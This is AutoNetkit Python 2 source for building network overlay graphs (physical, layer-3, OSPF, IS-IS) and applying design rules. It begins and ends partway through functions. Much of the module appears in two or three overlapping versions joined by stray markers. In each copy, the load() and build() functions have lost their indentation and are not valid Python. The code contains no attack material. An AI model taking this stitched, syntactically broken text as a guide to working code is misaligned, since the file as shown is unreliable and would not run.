    G_phy.add_edges_from(G_in.edges(type="physical"))
def build_conn(anm):
    """Build the directed conn (connectivity) overlay from the input overlay.

    NOTE(review): everything after the bare `return` below is unreachable -
    it appears hardware allocation was deliberately disabled; confirm intent
    before deleting.
    """
    G_in = anm['input']
    G_phy = anm['phy'] # only referenced by the disabled code below
    G_conn = anm.add_overlay("conn", directed = True)
    G_conn.add_nodes_from(G_in, retain=['label'])
    G_conn.add_edges_from(G_in.edges(type="physical"))
    #if G_in.data.Creator == "Maestro":
        #ank.copy_edge_attr_from(G_in, G_conn, "index")
    return
    # --- unreachable: disabled hardware allocation / graphics sync ---
    import autonetkit.allocate_hardware
    autonetkit.allocate_hardware.allocate(anm)
    G_graphics = anm['graphics']
    new_nodes = set(G_conn) - set(G_phy)
    #G_graphics.add_nodes_from(new_nodes, retain = ['x', 'y', 'asn', "device_type", "device_subtype"])
    for node in new_nodes:
        G_graphics.add_node(node, retain = ['x', 'y', 'asn', "device_type", "device_subtype"])
        #print node['graphics'].dump()
#TODO: Add a function to auto-update graphics, if any node present in overlay but not in graphics then add with sensible defaults
def build_ospf(anm):
    """
    Build OSPF graph.
    Allowable area combinations:
    0 -> 0
    0 -> x (x != 0)
    x -> 0 (x != 0)
    x -> x (x != 0)
    Not-allowed:
    x -> y (x != y, both != 0)
    """
    G_in = anm['input']
    G_ospf = anm.add_overlay("ospf")
    G_ospf.add_nodes_from(G_in.nodes("is_router"), retain=['asn'])
    G_ospf.add_nodes_from(G_in.nodes("is_switch"), retain=['asn'])
    G_ospf.add_edges_from(G_in.edges(), retain = ['edge_id'])
    ank.copy_attr_from(G_in, G_ospf, "ospf_area", dst_attr = "area") #TODO: move this into graphml (and later gml) reader
    # collapse switch clusters, then expand to direct router-router links
    ank.aggregate_nodes(G_ospf, G_ospf.nodes("is_switch"), retain = "edge_id")
    ank.explode_nodes(G_ospf, G_ospf.nodes("is_switch"), retain= "edge_id")
    G_ospf.remove_edges_from([link for link in G_ospf.edges() if link.src.asn != link.dst.asn]) # remove inter-AS links
    # normalise area to an int, defaulting to backbone (0)
    for router in G_ospf:
        if router.area == "None":
            #TODO: tidy up this default of None being a string
            router.area = 0
        router.area = int(router.area) #TODO: use dst type in copy_attr_from
    # list type
    # classify each router from its own area vs its neighbors' areas
    for router in G_ospf:
        neigh_areas = set(ank.neigh_attr(G_ospf, router, "area"))
        if len(neigh_areas) == 1:
            # All neighbors have same area
            neigh_area = neigh_areas.pop()
            if neigh_area != router.area:
                # router is in own area
                if router.area == 0:
                    router.type = "Backbone ABR" # case of single backbone ABR
                else:
                    router.type = "ABR"
            elif neigh_area == 0:
                # all neighbors are in area 0
                router.type = "Backbone"
            else:
                router.type = "Internal"
        else:
            # neighbors span multiple areas -> this router borders them
            if router.area == 0:
                router.type = "Backbone ABR"
            else:
                router.type = "ABR"
    #TODO: set default area, or warn if no area settings
    for router in G_ospf:
        # and set area on interface
        for edge in router.edges():
            if edge.area:
                continue # already allocated (from other "direction", as undirected)
            if router.area == edge.dst.area:
                edge.area = router.area # intra-area
            else:
                if router.area == 0 or edge.dst.area == 0:
                    # backbone to other area
                    if router.area == 0:
                        edge.area = edge.dst.area # router in backbone, use other area
                    else:
                        edge.area = router.area # router not in backbone, use its area
    #
    #TODO: do we want to allocate non-symmetric OSPF costs? do we need a directed OSPF graph?
    # (note this will all change once have proper interface nodes)
    for link in G_ospf.edges():
        link.cost = 1
def ip_to_net_ent_title_ios(ip):
    """Convert an IP address into an OSI Network Entity Title (IS-IS on IOS).

    >>> ip_to_net_ent_title_ios(IPAddress("192.168.19.1"))
    '49.1921.6801.9001.00'
    """
    try:
        octets = ip.words
    except AttributeError:
        # not an IPAddress object yet - coerce it first
        import netaddr
        octets = netaddr.IPAddress(ip).words
    log.debug("Converting IP to OSI ENT format")
    # zero-pad each octet to three digits, then regroup the 12 digits as 4.4.4
    padded = "".join("%03d" % int(octet) for octet in octets)
    # "49" is the private AFI prefix; trailing "00" is the NSEL
    return ".".join(["49", padded[0:4], padded[4:8], padded[8:12], "00"])
def build_isis(anm):
    """Build the isis overlay: an intra-AS IS-IS topology with switches collapsed."""
    G_in = anm['input']
    G_ip = anm['ip']
    G_isis = anm.add_overlay("isis")
    #TODO: filter only igp=isis nodes, set the igp as a default in build_network
    G_isis.add_nodes_from(G_in.nodes("is_router"), retain=['asn'])
    G_isis.add_nodes_from(G_in.nodes("is_switch"), retain=['asn'])
    G_isis.add_edges_from(G_in.edges(), retain = ['edge_id'])
    # Collapse each switch cluster, then expand to direct router-router links
    ank.aggregate_nodes(G_isis, G_isis.nodes("is_switch"), retain = "edge_id")
    ank.explode_nodes(G_isis, G_isis.nodes("is_switch"), retain = "edge_id")
    # IS-IS only runs inside an AS - drop any edge whose endpoints differ in ASN
    crossing = [link for link in G_isis.edges() if link.src.asn != link.dst.asn]
    G_isis.remove_edges_from(crossing)
    for node in G_isis:
        # NET is derived from the loopback address allocated in the ip overlay
        node.net = ip_to_net_ent_title_ios(G_ip.node(node).loopback)
        node.process_id = 1 # default
    for link in G_isis.edges():
        link.metric = 1 # default
def update_pika(anm):
    """Serialise the ANM and publish it (compressed) on the pika channel."""
    log.debug("Sending anm to pika")
    payload = autonetkit.ank_json.dumps(anm, None)
    pika_channel.publish_compressed("www", "client", payload)
# |
"""Module to build overlay graphs for network design"""
import itertools
import autonetkit
import autonetkit.ank as ank_utils
import autonetkit.ank_messaging as ank_messaging
import autonetkit.anm
import autonetkit.config
import autonetkit.exception
import autonetkit.load.graphml as graphml
import autonetkit.log as log
import networkx as nx
from autonetkit.exception import AutoNetkitException
SETTINGS = autonetkit.config.settings
#TODO: revisit phy_neighbors for eg ASN and use l3_conn instead
#TODO: note that build network now assumes input graph has interface mappings on nodes/edges
__all__ = ['build']
from autonetkit.ank_utils import call_log
@call_log
def load(input_graph_string):
#TODO: look at XML header for file type
try:
input_graph = graphml.load_graphml(input_graph_string)
except autonetkit.exception.AnkIncorrectFileFormat:
# try a different reader
try:
from autonetkit_cisco import load as cisco_load
except ImportError, e:
log.debug("Unable to load autonetkit_cisco %s" % e)
return # module not present (development module)
else:
input_graph = cisco_load.load(input_graph_string)
# add local deployment host
SETTINGS['General']['deploy'] = True
SETTINGS['Deploy Hosts']['internal'] = {
'VIRL': {
'deploy': True,
},
}
return input_graph
@call_log
def grid_2d(dim):
    """Create a dim x dim grid test topology.

    Every node is a cisco IOS XR router in AS 1, named "x_y" and placed on a
    150-unit grid; every link is marked as physical. Also registers the local
    "internal" deploy host in the global SETTINGS.

    Returns the NetworkX graph.
    """
    graph = nx.grid_2d_graph(dim, dim)
    for node in graph:
        graph.node[node]['asn'] = 1
        graph.node[node]['x'] = node[0] * 150
        graph.node[node]['y'] = node[1] * 150
        graph.node[node]['device_type'] = 'router'
        graph.node[node]['platform'] = 'cisco'
        graph.node[node]['syntax'] = 'ios_xr'
        graph.node[node]['host'] = 'internal'
        graph.node[node]['ibgp_role'] = "Peer"
    mapping = {node: "%s_%s" % (node[0], node[1]) for node in graph}
    # Networkx wipes data if remap with same labels
    nx.relabel_nodes(graph, mapping, copy=False)
    # fix: dropped the unused enumerate() index - the intended "global index
    # for sorting" was never stored. TODO: store an edge index if sorting needs it.
    for src, dst in graph.edges():
        graph[src][dst]['type'] = "physical"
    SETTINGS['General']['deploy'] = True
    SETTINGS['Deploy Hosts']['internal'] = {
        'cisco': {
            'deploy': True,
        },
    }
    return graph
@call_log
def initialise(input_graph):
    """Initialise an AbstractNetworkModel from a NetworkX graph.

    Builds the input overlay (undirected copy of input_graph), applies
    per-platform syntax defaults, and creates the graphics overlay used for
    plotting. Returns the new ANM.
    """
    anm = autonetkit.anm.AbstractNetworkModel()
    input_undirected = nx.Graph(input_graph)
    g_in = anm.add_overlay("input", graph=input_undirected)
    # set defaults
    if not g_in.data.specified_int_names:
        # if not specified then automatically assign interface names
        g_in.data.specified_int_names = False
    #import autonetkit.plugins.graph_product as graph_product
    #graph_product.expand(g_in) # apply graph products if relevant
    expand_fqdn = False
    # TODO: make this set from config and also in the input file
    if expand_fqdn and len(ank_utils.unique_attr(g_in, "asn")) > 1:
        # Multiple ASNs set, use label format device.asn
        anm.set_node_label(".", ['label', 'asn'])
    # per-platform router syntax defaults
    g_in.update(g_in.routers(platform="junosphere"), syntax="junos")
    g_in.update(g_in.routers(platform="dynagen"), syntax="ios")
    g_in.update(g_in.routers(platform="netkit"), syntax="quagga")
    #TODO: is this used?
    g_in.update(g_in.servers(platform="netkit"), syntax="quagga")
    autonetkit.ank.set_node_default(g_in, specified_int_names=None)
    g_graphics = anm.add_overlay("graphics") # plotting data
    g_graphics.add_nodes_from(g_in, retain=['x', 'y', 'device_type',
        'label', 'device_subtype', 'asn'])
    if g_in.data.Creator == "VIRL":
        #TODO: move this to other module
        # Multiple ASNs set, use label format device.asn
        #anm.set_node_label(".", ['label_full'])
        pass
    return anm
@call_log
def check_server_asns(anm):
    """Checks that servers have appropriate ASN allocated.
    Warns and auto-corrects servers which are connected to routers of a different AS.
    #TODO: provide manual over-ride for this auto-correct.
    """
    #TODO: Move to validate module?
    g_phy = anm['phy']
    for server in g_phy.servers():
        if server.device_subtype in ("SNAT", "FLAT"):
            continue # Don't warn on ASN for NAT elements
        l3_neighbors = list(server['l3_conn'].neighbors())
        l3_neighbor_asns = set(n.asn for n in l3_neighbors)
        if server.asn not in l3_neighbor_asns:
            neighs_with_asn = ["%s: AS %s" % (n, n.asn)
                for n in l3_neighbors] # tuples for warning message
            server.log.warning("Server does not belong to same ASN as neighbors %s" % (neighs_with_asn))
            if len(l3_neighbors) == 1:
                # single ASN of neighbor -> auto correct
                if server['input'].default_asn:
                    # ASN came from the default, safe to override
                    neigh_asn = l3_neighbor_asns.pop()
                    log.warning("Updating server %s AS from %s to %s" % (server, server.asn, neigh_asn))
                    server.asn = neigh_asn
                else:
                    log.info("Server %s ASN %s explictly set by user, not auto-correcting" %
                        (server, server.asn))
@call_log
def apply_design_rules(anm):
    """Applies appropriate design rules to ANM.

    Pipeline (order matters): phy -> l3 connectivity -> server ASN check ->
    vrf -> ip (v4/v6 per address_family) -> igp (ospf/eigrp/isis) -> bgp ->
    mpls te/oam -> vpn post-processing. The optional autonetkit_cisco hooks
    run before and after the igp/bgp stages when installed.
    """
    g_in = anm['input']
    build_phy(anm)
    g_phy = anm['phy']
    #autonetkit.update_http(anm)
    build_l3_connectivity(anm)
    check_server_asns(anm)
    #autonetkit.update_http(anm)
    from autonetkit.design.mpls import build_vrf
    build_vrf(anm) # need to do before to add loopbacks before ip allocations
    from autonetkit.design.ip import build_ip, build_ipv4, build_ipv6
    build_ip(anm) # ip infrastructure topology
    #TODO: set defaults at the start, rather than inline, ie set g_in.data.address_family then use later
    address_family = g_in.data.address_family or "v4" # default is v4
    #TODO: can remove the infrastructure now create g_ip seperately
    if address_family == "None":
        log.info("IP addressing disabled, disabling routing protocol configuration")
        anm['phy'].data.enable_routing = False
    if address_family == "None":
        log.info("IP addressing disabled, skipping IPv4")
        anm.add_overlay("ipv4") # create empty so rest of code follows through
        g_phy.update(g_phy, use_ipv4 = False)
    elif address_family in ("v4", "dual_stack"):
        build_ipv4(anm, infrastructure = True)
        g_phy.update(g_phy, use_ipv4 = True)
    elif address_family == "v6":
        # Allocate v4 loopbacks for router ids
        build_ipv4(anm, infrastructure = False)
        g_phy.update(g_phy, use_ipv4 = False)
    #TODO: Create a collision domain overlay for ip addressing - l2 overlay?
    if address_family == "None":
        log.info("IP addressing disabled, not allocating IPv6")
        anm.add_overlay("ipv6") # create empty so rest of code follows through
        g_phy.update(g_phy, use_ipv6 = False)
    elif address_family in ("v6", "dual_stack"):
        build_ipv6(anm)
        g_phy.update(g_phy, use_ipv6 = True)
    else:
        anm.add_overlay("ipv6") # placeholder for compiler logic
    default_igp = g_in.data.igp or "ospf"
    ank_utils.set_node_default(g_in, igp=default_igp)
    ank_utils.copy_attr_from(g_in, g_phy, "include_csr")
    try:
        from autonetkit_cisco import build_network as cisco_build_network
    except ImportError, e:
        log.debug("Unable to load autonetkit_cisco %s" % e)
    else:
        cisco_build_network.pre_design(anm)
    from autonetkit.design.igp import build_ospf, build_eigrp, build_isis
    build_ospf(anm)
    build_eigrp(anm)
    build_isis(anm)
    from autonetkit.design.bgp import build_bgp
    build_bgp(anm)
    #autonetkit.update_http(anm)
    from autonetkit.design.mpls import mpls_te, mpls_oam
    mpls_te(anm)
    mpls_oam(anm)
    # post-processing
    if anm['phy'].data.enable_routing:
        from autonetkit.design.mpls import mark_ebgp_vrf, build_ibgp_vpn_v4
        mark_ebgp_vrf(anm)
        build_ibgp_vpn_v4(anm) # build after bgp as is based on
    #autonetkit.update_http(anm)
    try:
        from autonetkit_cisco import build_network as cisco_build_network
    except ImportError, e:
        log.debug("Unable to load autonetkit_cisco %s" % e)
    else:
        cisco_build_network.post_design(anm)
    return anm
@call_log
def build(input_graph):
"""Main function to build network overlay topologies"""
anm = None
try:
anm = initialise(input_graph)
anm = apply_design_rules(anm)
#print {str(node): {'x': node.x, 'y': node.y} for node in anm['input']}
import autonetkit
autonetkit.update_http(anm)
except Exception, e:
# Send the visualisation to help debugging
import autonetkit
try:
autonetkit.update_http(anm)
except Exception, e:
# problem with vis -> could be coupled with original exception - raise original
log.warning("Unable to visualise: %s" % e)
raise # raise the original exception
return anm
def remove_parallel_switch_links(anm):
    """Remove duplicate physical links from a device into the same switch cluster.

    For each connected cluster of switches, if a single external node has more
    than one edge into the cluster, all but the first (sorted) edge are removed
    from the phy overlay, with a warning naming the affected interfaces.
    """
    from collections import defaultdict # hoisted out of the per-cluster loop
    g_phy = anm['phy']
    subs = ank_utils.connected_subgraphs(g_phy, g_phy.switches())
    for component in subs:
        log.debug("Checking for multiple links to switch cluster %s" % str(sorted(component)))
        # Collect all links into this cluster
        external_edges = []
        for switch in component:
            for edge in switch.edges():
                if edge.dst not in component:
                    external_edges.append(edge)
        # Group by the node they link to
        check_dict = defaultdict(list)
        for edge in external_edges:
            check_dict[edge.dst].append(edge)
        # Check to see if any nodes have more than one link into this aggregate
        for dst, edges in check_dict.items():
            if len(edges) > 1:
                edges_to_remove = sorted(edges)[1:] # remove all but first
                interfaces = ", ".join(sorted(str(edge.dst_int['phy']) for edge in edges))
                interfaces_to_disconnect = ", ".join(sorted(str(edge.dst_int['phy']) for edge in edges_to_remove))
                dst.log.warning("Multiple edges exist to same switch cluster: %s (%s). Removing edges from interfaces %s" % (
                    str(sorted(component)), interfaces, interfaces_to_disconnect))
                g_phy.remove_edges_from(edges_to_remove)
@call_log
def build_phy(anm):
    """Build the physical overlay: copy nodes/edges and attributes from input,
    apply VIRL management-network settings, allocate interfaces, and strip
    duplicate links into switch clusters.
    """
    g_in = anm['input']
    g_phy = anm['phy']
    g_phy.data.enable_routing = g_in.data.enable_routing
    if g_phy.data.enable_routing is None:
        g_in.data.enable_routing = True # default if not set
    g_phy.add_nodes_from(g_in, retain=['label', 'update', 'device_type', 'asn',
        'specified_int_names',
        'device_subtype', 'platform', 'host', 'syntax'])
    if g_in.data.Creator == "Topology Zoo Toolset":
        ank_utils.copy_attr_from(g_in, g_phy, "Network")
        ank_utils.set_node_default(g_phy, Network=None)
    g_phy.add_edges_from(g_in.edges(type="physical"))
    # TODO: make this automatic if adding to the physical graph?
    if g_in.data.Creator == "VIRL":
        g_phy.data.mgmt_interfaces_enabled = g_in.data.mgmt_interfaces_enabled
        #TODO: remove this code now allocated externally
        g_phy.data.mgmt_address_start = g_in.data.mgmt_address_start
        g_phy.data.mgmt_address_end = g_in.data.mgmt_address_end
        # fix: this assignment was accidentally duplicated
        g_phy.data.mgmt_prefixlen = g_in.data.mgmt_prefixlen
    ank_utils.copy_attr_from(g_in, g_phy, "use_cdp")
    ank_utils.copy_attr_from(g_in, g_phy, "use_onepk")
    ank_utils.copy_attr_from(g_in, g_phy, "label_full")
    ank_utils.copy_attr_from(g_in, g_phy, "indices")
    ank_utils.copy_attr_from(g_in, g_phy, "dont_configure_static_routing")
    ank_utils.copy_attr_from(g_in, g_phy, "server_username")
    ank_utils.copy_attr_from(g_in, g_phy, "server_ssh_key")
    ank_utils.set_node_default(g_phy, use_ipv4 = False, use_ipv6=False)
    g_phy.allocate_interfaces()
    for node in g_phy:
        for interface in node:
            specified_id = interface['input'].get("specified_id")
            if specified_id:
                interface.specified_id = specified_id # map across
    remove_parallel_switch_links(anm)
@call_log
def build_l3_connectivity(anm):
    """Build the l3_conn overlay: the input graph with switches collapsed.

    Switch nodes are aggregated into clusters and then exploded away, leaving
    direct layer-3 connectivity; edges created by the explosion are flagged
    as multipoint (on the edge and both of its interfaces).
    """
    #TODO: use this as base for ospf, ebgp, ip, etc rather than exploding in each
    g_in = anm['input']
    overlay = anm.add_overlay("l3_conn")
    retained = ['label', 'update', 'device_type', 'asn',
        'specified_int_names',
        'device_subtype', 'platform', 'host', 'syntax']
    overlay.add_nodes_from(g_in, retain=retained)
    overlay.add_nodes_from(g_in.switches(), retain=['asn'])
    overlay.add_edges_from(g_in.edges())
    ank_utils.aggregate_nodes(overlay, overlay.switches())
    for edge in ank_utils.explode_nodes(overlay, overlay.switches()):
        # links produced by exploding a switch connect more than two devices
        edge.multipoint = True
        edge.src_int.multipoint = True
        edge.dst_int.multipoint = True
@call_log
def build_conn(anm):
    """Build the directed conn (connectivity) overlay from the input overlay."""
    input_overlay = anm['input']
    g_conn = anm.add_overlay("conn", directed=True)
    g_conn.add_nodes_from(input_overlay, retain=['label'])
    g_conn.add_edges_from(input_overlay.edges(type="physical"))
    return
# tidying @minor
"""Module to build overlay graphs for network design"""
import itertools
import autonetkit
import autonetkit.ank as ank_utils
import autonetkit.ank_messaging as ank_messaging
import autonetkit.anm
import autonetkit.config
import autonetkit.exception
import autonetkit.load.graphml as graphml
import autonetkit.log as log
import networkx as nx
from autonetkit.exception import AutoNetkitException
SETTINGS = autonetkit.config.settings
#TODO: revisit phy_neighbors for eg ASN and use l3_conn instead
#TODO: note that build network now assumes input graph has interface mappings on nodes/edges
__all__ = ['build']
from autonetkit.ank_utils import call_log
@call_log
def load(input_graph_string):
#TODO: look at XML header for file type
try:
input_graph = graphml.load_graphml(input_graph_string)
except autonetkit.exception.AnkIncorrectFileFormat:
# try a different reader
try:
from autonetkit_cisco import load as cisco_load
except ImportError, e:
log.debug("Unable to load autonetkit_cisco %s" % e)
return # module not present (development module)
else:
input_graph = cisco_load.load(input_graph_string)
# add local deployment host
SETTINGS['General']['deploy'] = True
SETTINGS['Deploy Hosts']['internal'] = {
'VIRL': {
'deploy': True,
},
}
return input_graph
@call_log
def grid_2d(dim):
    """Create a dim x dim grid test topology.

    Every node is a cisco IOS XR router in AS 1, named "x_y" and placed on a
    150-unit grid; every link is marked as physical. Also registers the local
    "internal" deploy host in the global SETTINGS.

    Returns the NetworkX graph.
    """
    graph = nx.grid_2d_graph(dim, dim)
    for node in graph:
        graph.node[node]['asn'] = 1
        graph.node[node]['x'] = node[0] * 150
        graph.node[node]['y'] = node[1] * 150
        graph.node[node]['device_type'] = 'router'
        graph.node[node]['platform'] = 'cisco'
        graph.node[node]['syntax'] = 'ios_xr'
        graph.node[node]['host'] = 'internal'
        graph.node[node]['ibgp_role'] = "Peer"
    mapping = {node: "%s_%s" % (node[0], node[1]) for node in graph}
    # Networkx wipes data if remap with same labels
    nx.relabel_nodes(graph, mapping, copy=False)
    # fix: dropped the unused enumerate() index - the intended "global index
    # for sorting" was never stored. TODO: store an edge index if sorting needs it.
    for src, dst in graph.edges():
        graph[src][dst]['type'] = "physical"
    SETTINGS['General']['deploy'] = True
    SETTINGS['Deploy Hosts']['internal'] = {
        'cisco': {
            'deploy': True,
        },
    }
    return graph
@call_log
def initialise(input_graph):
    """Initialise an AbstractNetworkModel from a NetworkX graph.

    Builds the input overlay (undirected copy of input_graph), applies
    per-platform syntax defaults, and creates the graphics overlay used for
    plotting. Returns the new ANM.
    """
    anm = autonetkit.anm.AbstractNetworkModel()
    input_undirected = nx.Graph(input_graph)
    g_in = anm.add_overlay("input", graph=input_undirected)
    # set defaults
    if not g_in.data.specified_int_names:
        # if not specified then automatically assign interface names
        g_in.data.specified_int_names = False
    #import autonetkit.plugins.graph_product as graph_product
    #graph_product.expand(g_in) # apply graph products if relevant
    expand_fqdn = False
    # TODO: make this set from config and also in the input file
    if expand_fqdn and len(ank_utils.unique_attr(g_in, "asn")) > 1:
        # Multiple ASNs set, use label format device.asn
        anm.set_node_label(".", ['label', 'asn'])
    # per-platform router syntax defaults
    g_in.update(g_in.routers(platform="junosphere"), syntax="junos")
    g_in.update(g_in.routers(platform="dynagen"), syntax="ios")
    g_in.update(g_in.routers(platform="netkit"), syntax="quagga")
    #TODO: is this used?
    g_in.update(g_in.servers(platform="netkit"), syntax="quagga")
    autonetkit.ank.set_node_default(g_in, specified_int_names=None)
    g_graphics = anm.add_overlay("graphics") # plotting data
    g_graphics.add_nodes_from(g_in, retain=['x', 'y', 'device_type',
        'label', 'device_subtype', 'asn'])
    if g_in.data.Creator == "VIRL":
        #TODO: move this to other module
        # Multiple ASNs set, use label format device.asn
        #anm.set_node_label(".", ['label_full'])
        pass
    return anm
@call_log
def check_server_asns(anm):
    """Checks that servers have appropriate ASN allocated.
    Warns and auto-corrects servers which are connected to routers of a different AS.
    #TODO: provide manual over-ride for this auto-correct.
    """
    #TODO: Move to validate module?
    g_phy = anm['phy']
    for server in g_phy.servers():
        if server.device_subtype in ("SNAT", "FLAT"):
            continue # Don't warn on ASN for NAT elements
        l3_neighbors = list(server['l3_conn'].neighbors())
        l3_neighbor_asns = set(n.asn for n in l3_neighbors)
        if server.asn not in l3_neighbor_asns:
            neighs_with_asn = ["%s: AS %s" % (n, n.asn)
                for n in l3_neighbors] # tuples for warning message
            server.log.warning("Server does not belong to same ASN as neighbors %s" % (neighs_with_asn))
            if len(l3_neighbors) == 1:
                # single ASN of neighbor -> auto correct
                if server['input'].default_asn:
                    # ASN came from the default, safe to override
                    neigh_asn = l3_neighbor_asns.pop()
                    log.warning("Updating server %s AS from %s to %s" % (server, server.asn, neigh_asn))
                    server.asn = neigh_asn
                else:
                    log.info("Server %s ASN %s explictly set by user, not auto-correcting" %
                        (server, server.asn))
@call_log
def apply_design_rules(anm):
    """Applies appropriate design rules to ANM.

    Pipeline (order matters): phy -> l3 connectivity -> server ASN check ->
    vrf -> ip (v4/v6 per address_family) -> igp (ospf/eigrp/isis) -> bgp ->
    mpls te/oam -> vpn post-processing. The optional autonetkit_cisco hooks
    run before and after the igp/bgp stages when installed.
    """
    g_in = anm['input']
    build_phy(anm)
    g_phy = anm['phy']
    build_l3_connectivity(anm)
    check_server_asns(anm)
    from autonetkit.design.mpls import build_vrf
    build_vrf(anm) # need to do before to add loopbacks before ip allocations
    from autonetkit.design.ip import build_ip, build_ipv4, build_ipv6
    #TODO: replace this with layer2 overlay topology creation
    build_ip(anm) # ip infrastructure topology
    #TODO: set defaults at the start, rather than inline, ie set g_in.data.address_family then use later
    address_family = g_in.data.address_family or "v4" # default is v4
    #TODO: can remove the infrastructure now create g_ip seperately
    if address_family == "None":
        log.info("IP addressing disabled, disabling routing protocol configuration")
        anm['phy'].data.enable_routing = False
    if address_family == "None":
        log.info("IP addressing disabled, skipping IPv4")
        anm.add_overlay("ipv4") # create empty so rest of code follows through
        g_phy.update(g_phy, use_ipv4 = False)
    elif address_family in ("v4", "dual_stack"):
        build_ipv4(anm, infrastructure = True)
        g_phy.update(g_phy, use_ipv4 = True)
    elif address_family == "v6":
        # Allocate v4 loopbacks for router ids
        build_ipv4(anm, infrastructure = False)
        g_phy.update(g_phy, use_ipv4 = False)
    #TODO: Create a collision domain overlay for ip addressing - l2 overlay?
    if address_family == "None":
        log.info("IP addressing disabled, not allocating IPv6")
        anm.add_overlay("ipv6") # create empty so rest of code follows through
        g_phy.update(g_phy, use_ipv6 = False)
    elif address_family in ("v6", "dual_stack"):
        build_ipv6(anm)
        g_phy.update(g_phy, use_ipv6 = True)
    else:
        anm.add_overlay("ipv6") # placeholder for compiler logic
    default_igp = g_in.data.igp or "ospf"
    ank_utils.set_node_default(g_in, igp=default_igp)
    ank_utils.copy_attr_from(g_in, g_phy, "include_csr")
    try:
        from autonetkit_cisco import build_network as cisco_build_network
    except ImportError, e:
        log.debug("Unable to load autonetkit_cisco %s" % e)
    else:
        cisco_build_network.pre_design(anm)
    from autonetkit.design.igp import build_ospf, build_eigrp, build_isis
    build_ospf(anm)
    build_eigrp(anm)
    build_isis(anm)
    from autonetkit.design.bgp import build_bgp
    build_bgp(anm)
    #autonetkit.update_http(anm)
    from autonetkit.design.mpls import mpls_te, mpls_oam
    mpls_te(anm)
    mpls_oam(anm)
    # post-processing
    if anm['phy'].data.enable_routing:
        from autonetkit.design.mpls import mark_ebgp_vrf, build_ibgp_vpn_v4
        mark_ebgp_vrf(anm)
        build_ibgp_vpn_v4(anm) # build after bgp as is based on
    #autonetkit.update_http(anm)
    try:
        from autonetkit_cisco import build_network as cisco_build_network
    except ImportError, e:
        log.debug("Unable to load autonetkit_cisco %s" % e)
    else:
        cisco_build_network.post_design(anm)
    return anm
@call_log
def build(input_graph):
"""Main function to build network overlay topologies"""
anm = None
try:
anm = initialise(input_graph)
anm = apply_design_rules(anm)
#print {str(node): {'x': node.x, 'y': node.y} for node in anm['input']}
import autonetkit
autonetkit.update_http(anm)
except Exception, e:
# Send the visualisation to help debugging
import autonetkit
try:
autonetkit.update_http(anm)
except Exception, e:
# problem with vis -> could be coupled with original exception - raise original
log.warning("Unable to visualise: %s" % e)
raise # raise the original exception
return anm
def remove_parallel_switch_links(anm):
    """Remove redundant parallel links from a node into a switch cluster.

    For each connected cluster of switches in the physical overlay,
    gathers the edges entering the cluster from outside, groups them by
    the external endpoint, and — where a node has more than one edge into
    the same cluster — keeps only the first (sorted) edge, warning about
    the interfaces that get disconnected.
    """
    # Hoisted out of the per-component loop: the import is loop-invariant.
    from collections import defaultdict
    g_phy = anm['phy']
    subs = ank_utils.connected_subgraphs(g_phy, g_phy.switches())
    for component in subs:
        log.debug("Checking for multiple links to switch cluster %s" % str(sorted(component)))
        # Collect all links into this cluster
        external_edges = []
        for switch in component:
            for edge in switch.edges():
                if edge.dst not in component:
                    external_edges.append(edge)
        # Group by the node they link to
        check_dict = defaultdict(list)
        for edge in external_edges:
            check_dict[edge.dst].append(edge)
        # Check to see if any nodes have more than one link into this aggregate
        for dst, edges in check_dict.items():
            if len(edges) > 1:
                edges_to_remove = sorted(edges)[1:]  # remove all but first
                interfaces = ", ".join(sorted(str(edge.dst_int['phy']) for edge in edges))
                interfaces_to_disconnect = ", ".join(sorted(str(edge.dst_int['phy']) for edge in edges_to_remove))
                dst.log.warning("Multiple edges exist to same switch cluster: %s (%s). Removing edges from interfaces %s" % (
                    str(sorted(component)), interfaces, interfaces_to_disconnect))
                g_phy.remove_edges_from(edges_to_remove)
@call_log
def build_phy(anm):
    """Build physical overlay.

    Copies nodes, physical edges and per-device attributes from the input
    overlay onto the physical overlay, applies defaults, allocates
    interfaces, and prunes parallel links into switch clusters.
    """
    g_in = anm['input']
    g_phy = anm['phy']
    g_phy.data.enable_routing = g_in.data.enable_routing
    if g_phy.data.enable_routing is None:
        # Default if not set: record it on BOTH overlays so later reads of
        # either one agree (previously only g_in was updated, leaving
        # g_phy.data.enable_routing as None).
        g_in.data.enable_routing = True
        g_phy.data.enable_routing = True
    g_phy.add_nodes_from(g_in, retain=['label', 'update', 'device_type', 'asn',
                                       'specified_int_names',
                                       'device_subtype', 'platform', 'host', 'syntax'])
    if g_in.data.Creator == "Topology Zoo Toolset":
        ank_utils.copy_attr_from(g_in, g_phy, "Network")
        ank_utils.set_node_default(g_phy, Network=None)
    g_phy.add_edges_from(g_in.edges(type="physical"))
    # TODO: make this automatic if adding to the physical graph?
    if g_in.data.Creator == "VIRL":
        g_phy.data.mgmt_interfaces_enabled = g_in.data.mgmt_interfaces_enabled
        #TODO: remove this code now allocated externally
        g_phy.data.mgmt_address_start = g_in.data.mgmt_address_start
        g_phy.data.mgmt_address_end = g_in.data.mgmt_address_end
        # Duplicate assignment of mgmt_prefixlen removed.
        g_phy.data.mgmt_prefixlen = g_in.data.mgmt_prefixlen
    ank_utils.copy_attr_from(g_in, g_phy, "use_cdp")
    ank_utils.copy_attr_from(g_in, g_phy, "use_onepk")
    ank_utils.copy_attr_from(g_in, g_phy, "label_full")
    ank_utils.copy_attr_from(g_in, g_phy, "indices")
    ank_utils.copy_attr_from(g_in, g_phy, "dont_configure_static_routing")
    ank_utils.copy_attr_from(g_in, g_phy, "server_username")
    ank_utils.copy_attr_from(g_in, g_phy, "server_ssh_key")
    ank_utils.set_node_default(g_phy, use_ipv4 = False, use_ipv6=False)
    g_phy.allocate_interfaces()
    for node in g_phy:
        for interface in node:
            # Carry user-specified interface ids across from the input overlay.
            specified_id = interface['input'].get("specified_id")
            if specified_id:
                interface.specified_id = specified_id  # map across
    remove_parallel_switch_links(anm)
@call_log
def build_l3_connectivity(anm):
    """Create the l3_conn overlay: input topology with switch nodes
    aggregated into clusters and then exploded into direct edges."""
    #TODO: use this as base for ospf, ebgp, ip, etc rather than exploding in each
    g_in = anm['input']
    g_l3conn = anm.add_overlay("l3_conn")
    g_l3conn.add_nodes_from(g_in, retain=['label', 'update', 'device_type', 'asn',
                                          'specified_int_names',
                                          'device_subtype', 'platform', 'host', 'syntax'])
    g_l3conn.add_nodes_from(g_in.switches(), retain=['asn'])
    g_l3conn.add_edges_from(g_in.edges())
    ank_utils.aggregate_nodes(g_l3conn, g_l3conn.switches())
    exploded_edges = ank_utils.explode_nodes(g_l3conn,
                                             g_l3conn.switches())
    # Flag every edge produced by exploding switch nodes (and both of its
    # endpoint interfaces) as multipoint.
